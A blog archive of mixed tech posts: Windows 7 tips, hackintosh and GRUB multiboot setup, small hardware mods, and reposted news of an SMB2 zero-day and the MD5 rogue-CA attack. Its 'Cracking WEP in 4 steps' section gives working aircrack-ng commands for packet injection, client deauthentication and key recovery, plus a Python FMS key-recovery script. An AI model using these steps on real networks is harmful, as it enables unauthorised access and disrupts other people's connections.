Category Archives: Hacking

Windows 7 zero day exploit

A security researcher has said there is a zero-day vulnerability affecting Windows 7 and Vista.

The flaw in Windows 7 could allow an attack which would cause a critical system error, or “Blue Screen of Death”, according to researcher Laurent Gaffie.

Gaffie wrote in his blog that the flaw lies in a Server Message Block 2 (SMB2) driver.

“SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality,” wrote Gaffie in a blog post on Monday.

Gaffie said he had contacted Microsoft. Comments on his blog by other users said that the flaw could lead not only to denial of service, but could also lead to remote code execution.

Computer security publication ‘The H’ wrote on Tuesday that its German sister publication had tested the proof-of-concept code, and that while the exploit had caused a reboot on Vista, the exploit had not worked on Windows 7.

Metasploit creator HD Moore said in a tweet on Tuesday that an SMB bug appeared to have been introduced into Vista SP1. Coder Josh Goebel said in a blog post that he had added the exploit code to Metasploit.

Microsoft had not responded to a request for comment at the time of writing.

from: ZDNet UK

Windows 7 tricks and secrets

Lately I installed Windows 7 on my XPS 1210 and it's awesome. I had been discovering small tricks in Win 7 and then I stumbled upon this mega tricks list of the OS on MSDN blogs.

Enjoy.

  1. Windows Management. By now, you’ve probably seen that Windows 7 does a lot to make window management easier: you can “dock” a window to the left or right half of the screen by simply dragging it to the edge; similarly, you can drag the window to the top of the screen to maximize it, and double-click the window top / bottom border to maximize it vertically with the same horizontal width. What you might not know is that all these actions are also available with keyboard shortcuts:
    • Win+Left Arrow and Win+Right Arrow dock;
    • Win+Up Arrow and Win+Down Arrow maximizes and restores / minimizes;
    • Win+Shift+Up Arrow and Win+Shift+Down Arrow maximizes and restores the vertical size.

    This side-by-side docking feature is particularly invaluable on widescreen monitors – it makes the old Windows way of shift-clicking on two items in the taskbar and then using the context menu to arrange them feel really painful.

  2. Display Projection. Had enough of messing around with weird and wonderful OEM display driver utilities to get your notebook display onto an external projector? In that case, you’ll be pleased to know that projection is really quick and simple with Windows 7. Just hit Win+P, and you’ll be rewarded by the following pop-up window:
    The Win+P Projector Settings window allows you to quickly switch display settings.
    Use the arrow keys (or keep hitting Win+P) to switch to “clone”, “extend” or “external only” display settings. You can also access the application as displayswitch.exe.

    If you want broader control over presentation settings, you can also press Win+X to open the Windows Mobility Center, which allows you to turn on a presentation “mode” that switches IM clients to do not disturb, disables screensavers, sets a neutral wallpaper etc. (Note that this feature is also available in Windows Vista.)

  3. Cut Out The Clutter. Working on a document in a window and want to get rid of all the extraneous background noise? Simply hit Win+Home to minimize all the non-active background windows, keeping the window you’re using in its current position. When you’re ready, simply press Win+Home again to restore the background windows to their original locations.
  4. Multi-Monitor Windows Management. The earlier tip on window management showed how you can dock windows within a monitor. One refinement of those shortcuts is that you can use Win+Shift+Left Arrow and Win+Shift+Right Arrow to move windows from one monitor to another – keeping them in the same relative location to the monitor’s top-left origin.
  5. Command Junkies Only. One of the most popular power toys in Windows XP was “Open Command Prompt Here”, which enabled you to use the graphical shell to browse around the file system and then use the context menu to open a command prompt at the current working directory. In Windows 7 (and in Windows Vista, incidentally – although not many folk knew about it), you can simply hold the Shift key down while selecting the context menu to get exactly the same effect. If the current working directory is a network location, it will automatically map a drive letter for you.
  6. It’s a Global Village. If you’ve tried to change your desktop wallpaper, you’ve probably noticed that there’s a set of wallpapers there that match the locale you selected when you installed Windows. (If you picked US, you’ll see beautiful views of Crater Lake in Oregon, the Arches National Park, a beach in Hawai’i, etc.) In fact, there are several sets of themed wallpapers installed based on the language you choose, but the others are in a hidden directory. If you’re feeling in an international mood, simply browse to C:\Windows\Globalization\MCT and you’ll see a series of pictures under the Wallpaper directory for each country. Just double-click on the theme file in the Theme directory to display a rotation through all the pictures for that country. (Note that some countries contain a generic set of placeholder art for now.)
  7. The Black Box Recorder. Every developer wishes there was a way that end users could quickly and simply record a repro for the problem that they’re running into that is unique to their machine. Windows 7 comes to the rescue! Part of the in-built diagnostic tools that we use internally to send feedback on the product, the Problem Steps Recorder provides a simple screen capture tool that enables you to record a series of actions. Once you hit “record”, it tracks your mouse and keyboard and captures screenshots with any comments you choose to associate alongside them. Once you stop recording, it saves the whole thing to a ZIP file, containing an HTML-based “slide show” of the steps. It’s a really neat little tool and I can’t wait for it to become ubiquitous on every desktop! The program is called psr.exe; you can also search for it from Control Panel under “Record steps to reproduce a problem”.
    The Problem Steps Recorder provides an easy way for users to record a problem repro for later diagnosis.
  8. The Font of All Knowledge. Long Zheng will be happy: we’ve got rid of the Add Fonts dialog that has served Windows faithfully for the last twenty years. (Of course, for most of that time, it’s been deprecated – the easy way to install a set of fonts has simply been to drag them into the Fonts folder via Control Panel.) But now font installation is really easy – we’ve added an “Install” button to the font viewer applet that takes care of the installation process:
    You can install a font in Windows 7 from the standard font viewer dialog.
    There are lots of other new features built into Windows 7 that will satisfy those of a typographic bent, incidentally – grouping multiple weights together, the ability to hide fonts based on regional settings, a new text rendering engine built into the DirectWrite API, and support in the Font common file dialog for more than the four “standard” weights. For example:
    The new common font dialog in Windows 7 supports more than four weights for a font.
  9. Gabriola. As well as the other typographic features mentioned above, Windows 7 includes Gabriola, an elaborate display type from the Tiro Typeworks foundry that takes advantage of OpenType Layout to provide a variety of stylistic sets, flourishes and ornamentation ligatures:
    Some sample variants of the Gabriola display font.
  10. Who Stole My Browser? If you feel like Internet Explorer is taking a long time to load your page, it’s worth taking a look at the add-ons you have installed. One of the more helpful little additions in Internet Explorer 8 is instrumentation for add-on initialization, allowing you to quickly see whether you’re sitting around waiting for plug-ins to load. Just click Tools / Manage Add-ons, and then scroll right in the list view to see the load time. On my machine, I noticed that the Research add-on that Office 2007 installs was a particular culprit, and since I never use it, it was simple to disable it from the same dialog box.
  11. Rearranging the Furniture. Unless you’ve seen it demonstrated, you may not know that the icons in the new taskbar aren’t fixed in-place. You can reorder them to suit your needs, whether they’re pinned shortcuts or running applications. What’s particularly nice is that once they’re reordered, you can start a new instance of any of the first five icons by pressing Win+1, Win+2, Win+3 etc. I love that I can quickly fire up a Notepad2 instance on my machine with a simple Win+5 keystroke, for instance. What’s less well-known is that you can similarly drag the system tray icons around to rearrange their order, or move them in and out of the hidden icon list. It’s an easy way to customize your system to show the things you want, where you want them.
  12. Installing from a USB Memory Stick. My wife has a Samsung NC10 netbook (very nice machine, by the way), and we wanted to install Windows 7 Beta on this machine to replace the pre-installed Windows XP environment. Like most netbook-class devices, this machine has no built-in media drive, and nor did I have an external USB DVD drive available to boot off. The solution: I took a spare 4GB USB 2.0 thumbdrive, reformatted it as FAT32, and simply copied the contents of the Windows 7 Beta ISO image to the memory stick using xcopy e:\ f:\ /e /f (where e: was the DVD drive and f: was the removable drive location). Not only was it easy to boot and install from the thumbdrive, it was also blindingly fast: quicker than the corresponding DVD install on my desktop machine. It’s also worth noting in passing that Windows 7 is far better suited to a netbook than any previous operating system: it has a much lighter hard drive and memory footprint than Windows Vista, while also being able to optimize for solid state drives (for example, it switches off disk defragmentation since random read access is as fast as sequential read access, and it handles file deletions differently to minimize wear on the solid state drive).
  13. I Want My Quick Launch Toolbar Back! You might have noticed that the old faithful Quick Launch toolbar is not only disabled by default in Windows 7, it’s actually missing from the list of toolbars. As is probably obvious, the concept of having a set of pinned shortcut icons is now integrated directly into the new taskbar. Based on early user interface testing, we think that the vast majority of users out there (i.e. not the kind of folk who read this blog, with the exception of my mother) will be quite happy with the new model, but if you’re after the retro behavior, you’ll be pleased to know that the old shortcuts are all still there. To re-enable it, do the following:
    • Right-click the taskbar, choose Toolbars / New Toolbar
    • In the folder selection dialog, enter the following string and hit OK:
      %userprofile%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
    • Turn off the “lock the taskbar” setting, and right-click on the divider. Make sure that “Show text” and “Show title” are disabled and the view is set to “small icons”.
    • Use the dividers to rearrange the toolbar ordering to choice, and then lock the taskbar again.

    If it’s not obvious by the semi-tortuous steps above, it’s worth noting that this isn’t something we’re exactly desperate for folks to re-enable, but it’s there if you really need it for some reason. Incidentally, we’d love you to really try the new model first and give us feedback on why you felt the new taskbar didn’t suit your needs.

  14. It’s a Drag. Much play has been made of the Jump Lists feature in Windows 7, allowing applications like Windows Live Messenger to offer an easy task-based entry point. Jump lists replace the default right-click context menu in the new taskbar; another way to access them (particularly useful if you’re running Windows 7 on a one-button MacBook) is by left-clicking and dragging up in a kind of “swooshing” motion. This was designed for touch-enabled devices like the beautiful HP TouchSmart all-in-one PC, where the same gesture applies. Another place where you can “swoosh” (not an official Microsoft term) is the IE 8 address bar, where the downward drag gesture brings up an expanded list containing the browser history, favorites and similar entries. The slower you drag, the cooler the animation!
  15. Standards Support. Every review of Windows 7 that I’ve seen has noted the revamped WordPad and Paint applets that add an Office-like ribbon to expose their functionality. Few, however, have noticed one small but hopefully appreciated feature: WordPad can now read and write not only the Word 2007-compatible Office Open XML file format but also the OpenDocument specification that IBM and Sun have been advocating:
    WordPad in Windows 7 allows you to save in ODF or OOXML formats.
  16. Windows Vista-Style Taskbar. I wasn’t initially a fan of the Windows 7 taskbar when it was first introduced in early Windows 7 builds, but as the design was refined in the run up to the beta, I was converted and now actively prefer the new look, particularly when I’ve got lots of windows open simultaneously. For those who really would prefer a look more reminiscent of Windows Vista, the good news is that it’s easy to customize the look of the taskbar to more closely mirror the old version:
    The Windows 7 Taskbar can be configured for a Windows Vista compatibility view.
    To achieve this look, right-click on the taskbar and choose the properties dialog. Select the “small icons” checkbox and under the “taskbar buttons” setting, choose “combine when taskbar is full”. It’s not pixel-perfect in accuracy, but it’s close from a functionality point of view.
  17. Peeking at the Desktop. While we’re on the taskbar, it’s worth noting a few subtleties. You’ve probably seen the small rectangle in the bottom right hand corner: this is the feature we call “Aero Peek”, which enables you to see any gadgets or icons you’ve got on your desktop. I wanted to note that there’s a keyboard shortcut that does the same thing – just press Win+Space.
  18. Running with Elevated Rights. Want to quickly launch a taskbar-docked application as an administrator? It’s easy – hold down Ctrl+Shift while you click on the icon, and you’ll immediately launch it with full administrative rights (assuming your account has the necessary permissions, of course!)
  19. One More of the Same, Please. I’ve seen a few folk caught out by this one. If you’ve already got an application open on your desktop (for example, a command prompt window), and you want to open a second instance of the same application, you don’t have to go back to the start menu. You can simply hold down the Shift key while clicking on the taskbar icon, and it will open a new instance of the application rather than switching to the existing application. For a keyboard-free shortcut, you can middle-click with the third mouse button to do the same thing. (This trick assumes that your application supports multiple running instances, naturally.)
  20. Specialized Windows Switching. Another feature that power users will love is the ability to do a kind of “Alt+Tab” switching across windows that belong to just one application. For example, if you’ve got five Outlook message windows open along with ten other windows, you can quickly tab through just the Outlook windows by holding down the Ctrl key while you repeatedly click on the single Outlook icon. This will toggle through each of the five Outlook windows in order, and is way faster than opening Alt+Tab and trying to figure out which of the tiny thumbnail images relates to the specific message you’re trying to find.
  21. Walking Through the Taskbar. Another “secret” Windows shortcut: press Win+T to move the focus to the taskbar. Once you’re there, you can use the arrow keys to select a particular window or group and then hit Enter to launch or activate it. As ever, you can cancel out of this mode by hitting the Esc key. I don’t know for sure, but I presume this shortcut was introduced for those with accessibility needs. However, it’s equally valuable to power users – another good reason for all developers to care about ensuring their code is accessible.
  22. The Widescreen Tip. Almost every display sold these days is widescreen, whether you’re buying a notebook computer or a monitor. While it might be great for watching DVDs, when you’re trying to get work done it can sometimes feel like you’re a little squeezed for vertical space. As a result, the first thing I do when I set up any new computer is to dock the taskbar to the left hand side of the screen. I can understand why we don’t set this by default – can you imagine the complaints from enterprise IT departments who have to retrain all their staff – but there’s no reason why you as a power user should have to suffer from default settings introduced when the average screen resolution was 800×600.

    In the past, Windows did an indifferent job of supporting “side dockers” like myself. Sure, you could move the taskbar, but it felt like an afterthought – the gradients would be wrong, the Start menu had a few idiosyncrasies, and you’d feel like something of a second-class citizen. The Windows 7 taskbar feels almost as if it was designed with vertical mode as the default – the icons work well on the side of the screen, shortcuts like the Win+T trick mentioned previously automatically switch from left/right arrows to up/down arrows, and so on. The net effect is that you wind up with a much better proportioned working space.

    Try it – in particular, if you’ve got a netbook computer that has a 1024×600 display, you’ll immediately appreciate the extra space for browsing the Internet. For the first day you’ll feel a little out of sync, but then I guarantee you’ll become an enthusiastic convert!

  23. Pin Your Favorite Folders. If you’re always working in the same four or five folders, you can quickly pin them with the Explorer icon on the taskbar. Hold the right-click button down and drag the folder to the taskbar, and it will be automatically pinned in the Explorer Jump List.
  24. Starting Explorer from “My Computer”. If you spend more time manipulating files outside of the documents folders than inside, you might want to change the default starting directory for Windows Explorer so that it opens at the Computer node:
    The Computer node in Windows 7.
    To do this, navigate to Windows Explorer in the Start Menu (it’s in the Accessories folder). Then edit the properties and change the target to read:
    %SystemRoot%\explorer.exe /root,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}

    If you want the change to affect the icon on the taskbar, you’ll need to unpin and repin it to the taskbar so that the new shortcut takes effect. It’s worth noting that Win+E will continue to display the documents library as the default view: I’ve not found a way to change this from the shell at this time.
  25. ClearType Text Tuning and Display Color Calibration. If you want to tune up your display for image or text display, we have the tools included out of the box. It’s amazing what a difference this makes: by slightly darkening the color of the text and adjusting the gamma back a little, my laptop display looks much crisper than it did before. You’d adjust the brightness and contrast settings on that fancy 42” HDTV you’ve just bought: why wouldn’t you do the same for the computer displays that you stare at every day?
    Check out cttune.exe and dccw.exe respectively, or run the applets from Control Panel.
  26. ISO Burning. Easy to miss if you’re not looking for it: you can double-click on any DVD or CD .ISO image and you’ll see a helpful little applet that will enable you to burn the image to a blank disc. No more grappling for shareware utilities of questionable parentage!
    You can burn an ISO image to disk with this built-in utility in Windows 7.
  27. Windows Movie Maker. Windows 7 doesn’t include a movie editing tool – it’s been moved to the Windows Live Essentials package, along with Photo Gallery, Mail and Messenger. Unfortunately, Windows Live Movie Maker is currently still in an early beta that is missing most of the old feature set (we’re reworking the application), and so you might be feeling a little bereft of options. It goes without saying that we intend to have a better solution by the time we ship Windows 7, but in the meantime the best solution for us early adopters is to use Windows Movie Maker 2.6 (which is essentially the same as the most recent update to the Windows XP version). It’s missing the full set of effects and transitions from the Windows Vista version, and doesn’t support HD editing, but it’s pretty functional for the typical usage scenario of home movie editing.
    Windows Movie Maker 2.6 is compatible with Windows 7.
    Download Windows Movie Maker 2.6 from here:
    http://microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc
  28. Hiding the Windows Live Messenger Icon. Hopefully your first act after Windows 7 setup completed was to download and install the Windows Live Essentials suite of applications (if not, then you’re missing out on a significant part of the Windows experience). If you’re a heavy user of IM, you may love the way that Windows Live Messenger is front and central on the taskbar, where you can easily change status and quickly send an IM to someone:
    Windows Live Messenger appears by default on the taskbar.
    On the other hand, you may prefer to keep Windows Live Messenger in the system tray where it’s been for previous releases. If so, you can fool the application into the old style of behavior. To do this, close Windows Live Messenger, edit the shortcut properties and set the application to run in Windows Vista compatibility mode. Bingo!
  29. Enjoy The Fish. I’m surprised that not many people seem to have caught the subtle joke with the Siamese fighting fish that is part of the default background, so I’ll do my part at keeping the secret hidden. Check out wikipedia for a clue.
  30. When All Else Fails… There are always those times when you’re in a really bad spot – you can’t boot up properly, and what you really want is something you can quickly use to get at a command prompt so you can properly troubleshoot. Windows 7 now includes the ability to create a system repair disc, which is essentially a CD-bootable version of Windows that just includes the command prompt and a suite of system tools. Just type “system repair disc” in the Start Menu search box, and you’ll be led to the utility.

from: msdn blogs

Mac OS X 10.5.6 on my XPS 1210

I have been fascinated by Apple’s Mac OS ever since I got to know about it. And when I came to know that I could install it on my laptop, I was delighted. I have been successful in installing various versions from the days of OS X 10.4 [Tiger]. Lately I thought of installing 10.5.6 and upgrading it to 10.5.7 on the same old XPS m1210 which I bought in November 2006.

My XPS Mac

Mac OS X 10.5.6 on my XPS m1210 with triple boot.

My previous posts.

Leopard 10.5.1 [Kalyway] on my XPS1210

My Dell o MAC

Mac OSX + XP dual boot

XPS 1210 camera hack.

I got hold of an additional Logitech camera that is used in the Dell XPS 1210 [just don’t ask me how]. I had no use for it as I already had my XPS camera replaced. It lay in my drawer for several weeks and then one day I decided to connect it to my desktop for my younger brother to video chat with me.

The advantage of this camera is that it is USB and has a builtin microphone.

So no hassles of connecting a mic to the rear of the cabinet.

What all you need:

1. XPS 1210 camera.

2. USB extension cable and USB connector.

3. Something to cut wires and plastic.

4. A CD case of 10 CDs [the usual round plastic one].

What I did was simply cut the wires of the camera connector, took another USB connector and connected the same coloured wires. Tested it and it worked.


I cut the CD box cover to screw the camera on the hinge-like structure that I cut from the same plastic.

I also made a cut on the edge to fix the USB connector.


This is how it looked like after being done.

I used a USB extension cable to plug the camera into the USB ports on the rear panel of my desktop.

The reason for using the extension was to keep it modular and, most of all, I didn’t want to cut the extension cable as it was a new one 😉 and it remains usable with other devices.


The above pictures show the end result. And you can see it working!

Bluetooth Headset Antenna Hack

I had an old Orchid mono Bluetooth headset lying around in my drawer for so many months. The reason for not using it was that I didn’t own a Bluetooth-enabled phone 😉. Now that I’ve got one, I tried to test it.


And to my disappointment the range was not too good and there was interference when I kept my phone in my trouser pocket. I guess my body was acting as a damper.

So I decided to increase the length of its antenna by adding a length of copper wire. I know this sounds crazy, but sheer craziness works many a time.

It did work and following is how I did it.

I ripped apart my headset.

Took a small length of insulated copper wire, thin and of the kind that is used in small 3V motor windings.


There in the picture above you can notice a small white box kind of thing. It has one end connected to the circuit and the other was free.

So, making a calculated blind guess, I soldered the wire to the open end and extended the antenna.


And wow. It did work.

I then packed it up, took the wire out near the microphone at the bottom and then bent it along the crevice to secure it. The extra length was cut off. Now I get enough signal to hear clearly in my ear what is being transmitted from my Nokia 6500.

Leopard, Ubuntu and Windows XP multiboot

I have been a fan of the Mac OS ever since I came to know about it. When I got my first computer I tried my best to make Windows look like a Mac, but it was not up to my expectations and buying a Mac was not an option for me. Then came the OSX86 project and it made my dream come true. I started experimenting with OS X 10.4.8 and kept trying to get it working on my Minimachine [XPS 1210]. It took me around 6 months and several GBs of downloads to get it to work.

I joined college for an MBA, and the Mac OS in its latest flavour, named Leopard, was with me till I had to let go of it to install Linux, because I had never thought that I would be installing 3 OSs simultaneously. It went on like that for 6 more months and I was without Mac OS. Today I reinstalled Mac OS X 10.5.2 and it just didn’t boot, as I had Ubuntu installed previously too and I got the Grub error…

Then I did the following to fix grub and added an entry into grub for booting macosx…

How to fix Grub:

1. Boot the Desktop/Live CD. (Use Ubuntu 8.04 or later)

2. Open a terminal (Applications -> Accessories -> Terminal)

3. Start grub as root with the following command:

     sudo grub

4. You will get a grub prompt (see below) which we will use to find the root partition and install grub to the MBR (hd0):

         [ Minimal BASH-like line editing is supported.   For
         the   first   word,  TAB  lists  possible  command
         completions.  Anywhere else TAB lists the possible
         completions of a device/filename. ]

     grub>

   Type the following and press enter:

     grub> find /boot/grub/stage1

   If you get "Error 15: File not found", try the following:

     grub> find /grub/stage1

   Using this information, set the root device (fill in X,Y with whatever the find command returned; for me it was (hd0,3)):

     grub> root (hdX,Y)

   Install Grub:

     grub> setup (hd0)

   Exit Grub:

     grub> quit

5. Boot into Ubuntu.

6. Open a terminal and run this command; it lets you configure your boot order:

     sudo gedit /boot/grub/menu.lst

7. Add an entry for OS X in the editor window (replace (hd0,0) with your OS X partition):

     title OSX86
     root (hd0,0)
     chainloader +1
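For reference, here is what the end of a GRUB legacy menu.lst looks like once both chainloaded systems are added. This is an added example, not the author's actual file: the partition numbers are assumptions for illustration, and the Ubuntu entries generated by the Ubuntu installer are assumed to sit above these lines.

```text
# Added example menu.lst fragment (not the author's file). Assumed layout:
#   (hd0,0) = Mac OS X (Leopard) partition, handed to the Darwin boot loader
#   (hd0,1) = Windows XP partition
# GRUB legacy counts partitions from 0, so (hd0,0) is the FIRST partition.
# The Ubuntu "title ... kernel ... initrd" entries written by the installer
# stay above this block; chainloaded systems only need root + chainloader.

title Leopard (OSX86)
root (hd0,0)
chainloader +1

title Windows XP
root (hd0,1)
makeactive
chainloader +1
```

chainloader +1 hands control to the boot sector at the start of the selected partition, which is why the OS X entry lands you in the Darwin loader rather than directly in the kernel; makeactive is only needed for Windows, whose boot sector expects its partition to be flagged active.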

Now Grub lets me choose which OS to boot:

Ubuntu

Leopard

Windows XP

Grub on minimachine

When I choose Leopard I am presented with the Darwin x86 boot loader, which presents to me all partitions to boot from, and if I choose Linux from Darwin then I again get back to Grub… 🙂

Darwin boot loader on minimachine

I can just keep switching between boot loaders and boot any OS that I want…

The existing issues of single core only and no camera and card reader and no shut down still bug me… The shutdown and sleep had worked for me at times but not always.

How to export directory listing to text file

I did this a couple of times and every time I had to look for the information on the web, so this time I sort of thought to document it for reference; many others might find it useful too.

It comes in handy when a large list of files with their paths has to be created. One cannot type in the paths for, say, a directory containing 1000 or so images by hand, yet you may really need to do that for some database or a gallery.

To do this we just need to type in a single line in the command prompt and all is done:

1) Open the command line (cmd.exe in NT/2000/XP).
2) Navigate to the required directory using the cd command.
3) Type the following:

     dir /b > filelist.txt

A file called filelist.txt will be created with the directory contents. If you want to create the file list elsewhere, use a fully qualified file name or use the ..\ convention. Don’t forget that Windows uses \ not / as directory delimiters.

PS3 used to crack SSL

A team of security researchers and academics has broken a core piece of internet technology. They made their work public at the 25th Chaos Communication Congress in Berlin today. The team was able to create a rogue certificate authority and use it to issue valid SSL certificates for any site they want. The user would have no indication that their HTTPS connection was being monitored/modified.

This attack is possible because of a flaw in MD5. MD5 is a hashing algorithm; it is meant to give every distinct file a different hash. In 2004, a team of Chinese researchers demonstrated creating two different files that had the same MD5 hash. In 2007, another team showed theoretical attacks that took advantage of these collisions. The team focused on SSL certificates signed with MD5 for their exploit.

The first step was doing some broad scans to see what certificate authorities (CA) were issuing MD5 signed certs. They collected 30K certs from Firefox trusted CAs. 9K of them were MD5 signed. 97% of those came from RapidSSL.

Having selected their target, the team needed to generate their rogue certificate to transfer the signature to. They employed the processing power of 200 Playstation 3s to get the job done. For this task, it’s the equivalent of 8000 standard CPU cores or $20K of Amazon EC2 time. The task takes ~1-2 days to calculate. The tricky part was knowing the content of the certificate that would be issued by RapidSSL. They needed to predict two variables: the serial number and the timestamp. RapidSSL’s serial numbers were all sequential. From testing, they knew that RapidSSL would always sign six seconds after the order was acknowledged. Knowing these two facts they were able to generate a certificate in advance and then purchase the exact certificate they wanted. They’d purchase certificates to advance the serial number and then buy on the exact time they calculated.

The cert was issued to their particular domain, but since they controlled the content, they changed the flags to make themselves an intermediate certificate authority. That gave them authority to issue any certificate they wanted. All of these ‘valid’ certs were signed using SHA-1.

If you set your clock back to before August 2004, you can try out their live demo site. The rogue certificate was deliberately given an already-expired validity period as a safety measure for the example; the attack would work identically with a certificate that hasn’t expired. There’s a project site and a much more detailed writeup than this.

To close this hole, the affected CAs are now using SHA-1 for signing, and Microsoft and Mozilla (Firefox) will be blacklisting the team’s rogue CA in their browser products.

source

Cracking WEP in 4 steps

Disclaimer: This is just to show how insecure WEP is. This guide is not meant to teach how to crack. Use at your own discretion. I am not to be held responsible for any harm done.

Prerequisites:

BackTrack 3

A wireless card supported by the aircrack-ng suite (monitor mode and packet injection)

10 minutes of your time.

Step 1: Set the wireless card into monitor mode

Command = “airmon-ng start eth0”

“airmon-ng” is the program itself.

“eth0” The name of my wireless card. airmon-ng prints the name of the monitor-mode interface it enabled; if that differs from the card’s own name (for example ath0 on Atheros/madwifi drivers), use the reported name in every command below. The rest of this guide assumes it is eth0.

Step 2: Check for available networks and pick the one whose key you want to recover.

Command = “airodump-ng -w capture -c 6 eth0”

“airodump-ng” is the program itself.

“-w capture” Writes the sniffed packets to a file; airodump-ng appends a counter, so the first file is “capture-01.cap”.

“-c 6” Makes the program ONLY sniff on channel 6 (the channel of the target AP as shown in the airodump-ng listing; run it once without -c to see all networks and their channels).

“eth0” The name of my wireless card (the monitor-mode interface from step 1).

Leave this running in its own terminal while you do step 3: the IVs it collects are what step 4 cracks, and it needs tens of thousands of them.

Step 3: Generate some traffic on your own to save time.

WEP encrypts every frame with RC4 under the secret key plus a 24-bit IV that is sent in the clear, and the cracking in step 4 is statistical: it needs many frames with distinct IVs. On a quiet network that takes a long time, so inject traffic instead.

Command = “aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0”

“aireplay-ng” Name of the program.

“--arpreplay” Is the function of aireplay you are trying to perform, in this case capturing an encrypted ARP request from the network and replaying it over and over. The AP re-broadcasts each replayed request encrypted under a fresh IV, which is exactly what the cracker needs. (“-3” is the short form.)

“-b 00:11:22:33:44:55” MAC address of the target AP (its BSSID).

“-h 66:77:88:99:00:AA” MAC address of a machine already connected to that AP, used as the source address so that the AP accepts the replayed frames.

“eth0” Name of my wireless card.

Optional step: if no ARP request shows up for arpreplay to pick up, kick a connected client off the network; when it re-associates it will normally send an ARP request.

Command = “aireplay-ng -e Linksys -a 00:11:22:33:44:55 -c 66:77:88:99:00:AA --deauth 10 eth0”

“aireplay-ng” is the program itself.

“-e Linksys” is the SSID of the target AP.

“-a 00:11:22:33:44:55” is the MAC address of the target AP.

“-c 66:77:88:99:00:AA” is the MAC address of the target machine connected to that AP (you should be able to find any machines connected to the AP from looking at the info in airodump-ng).

“--deauth 10” The type of attack we’re performing, in this case the deauthentication attack repeated 10 times.

“eth0” The name of my wireless card.

Step 4: Do the cracking of the accumulated packets.

Command = “aircrack-ng capture-01.cap”

“aircrack-ng” is the program itself.

“capture” is the name of the file we wrote packets into. “-01” is added automatically to the filename and “.cap” is the extension. You can run this while airodump-ng is still capturing; when aircrack-ng fails it waits for more IVs and re-reads the growing file.

Once you hit enter, you will be presented with a list of the networks found in the capture. Select the index number of your AP and hit enter. The key is not decrypted but recovered statistically from the IVs: as a rule of thumb aircrack-ng’s default PTW attack needs on the order of 20,000 captured data packets for a 64-bit key and about 40,000 for a 128-bit key. If enough packets have been captured the key is printed at the end; if not, leave steps 2 and 3 running and try again.
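Why collecting IVs is enough to recover the key, as an added example (this is not aircrack-ng’s code and is not part of the original guide): WEP encrypts each frame with RC4 under the 3-byte IV concatenated with the secret key, sends the IV in the clear, and every data frame starts with the fixed LLC/SNAP byte 0xAA, so each captured frame gives away one keystream byte for a known IV. The block below runs the original FMS attack from 2001 against a constructed access point with a made-up 40-bit key. aircrack-ng’s default PTW attack is a stronger relative that needs far fewer frames, but the principle is the same, and it is why step 3 works at all: every replayed ARP frame hands the attacker another (IV, keystream byte) pair.

```python
"""Toy FMS (Fluhrer-Mantin-Shamir, 2001) key recovery against WEP's use of RC4.

Added example: not aircrack-ng's code and not part of the original guide.
WEP encrypts each frame with RC4 under IV || secret_key, sends the 3-byte IV in
the clear, and every data frame starts with the fixed LLC/SNAP byte 0xAA, so
one captured frame leaks one keystream byte for a known IV. The access point
below is a constructed stand-in and the 40-bit key is made up.
"""
from collections import Counter
from typing import Dict, List, Optional

SNAP_DSAP = 0xAA  # first plaintext byte of every WEP-encrypted data frame


def rc4_ksa(key: bytes) -> List[int]:
    """RC4 key scheduling algorithm."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_keystream_byte(key: bytes) -> int:
    """First PRGA output byte: the only keystream byte the attack needs."""
    S = rc4_ksa(key)
    j = S[1]  # PRGA step with i = 1, j = 0 + S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


class WepAccessPoint:
    """Constructed AP: what a sniffer sees is the ciphertext under IV || secret."""

    def __init__(self, secret: bytes):
        self._secret = secret

    def first_cipher_byte(self, iv: bytes) -> int:
        return rc4_first_keystream_byte(iv + self._secret) ^ SNAP_DSAP


def fms_candidate(iv: bytes, recovered: List[int], keystream0: int) -> Optional[int]:
    """One FMS vote for secret byte number len(recovered), or None if the IV does
    not reach the 'resolved' state.

    Simulate the first A+3 KSA steps with the bytes already known (IV plus the
    recovered secret bytes). If afterwards S[1] + S[S[1]] == A+3, then with about
    5% probability the first keystream byte equals the value swapped into S[A+3]
    at step A+3, giving K[A+3] = j_(A+3) - j_(A+2) - S[A+3]; otherwise the vote
    is noise, which the majority count absorbs."""
    A = len(recovered)
    known = list(iv) + recovered
    S = list(range(256))
    j = 0
    for i in range(A + 3):
        j = (j + S[i] + known[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
        return None
    return (S.index(keystream0) - j - S[A + 3]) & 0xFF


def recover_key(ap: WepAccessPoint, secret_len: int, width: int = 4) -> Optional[bytes]:
    """Recover the secret byte by byte from the weak IV class (A+3, 255, X).

    Each position gets 256 weak IVs and roughly 13 correct votes against a flat
    spread of wrong ones, so the top `width` candidates per byte are searched and
    a complete candidate key is confirmed against a few ordinary IVs."""
    seen: Dict[bytes, int] = {}

    def keystream0(iv: bytes) -> int:
        # Attacker's view: captured ciphertext byte XOR the known plaintext byte.
        if iv not in seen:
            seen[iv] = ap.first_cipher_byte(iv) ^ SNAP_DSAP
        return seen[iv]

    checks = [bytes([17, 42, 99]), bytes([200, 1, 2]), bytes([5, 5, 5]), bytes([77, 0, 250])]

    def search(recovered: List[int]) -> Optional[bytes]:
        A = len(recovered)
        if A == secret_len:
            key = bytes(recovered)
            ok = all(rc4_first_keystream_byte(iv + key) == keystream0(iv) for iv in checks)
            return key if ok else None
        votes = Counter()
        for x in range(256):
            iv = bytes([A + 3, 255, x])
            cand = fms_candidate(iv, recovered, keystream0(iv))
            if cand is not None:
                votes[cand] += 1
        for cand, _ in votes.most_common(width):
            found = search(recovered + [cand])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    secret = bytes.fromhex("0badc0ffee")  # constructed 40-bit WEP key
    print(recover_key(WepAccessPoint(secret), 5).hex())
```

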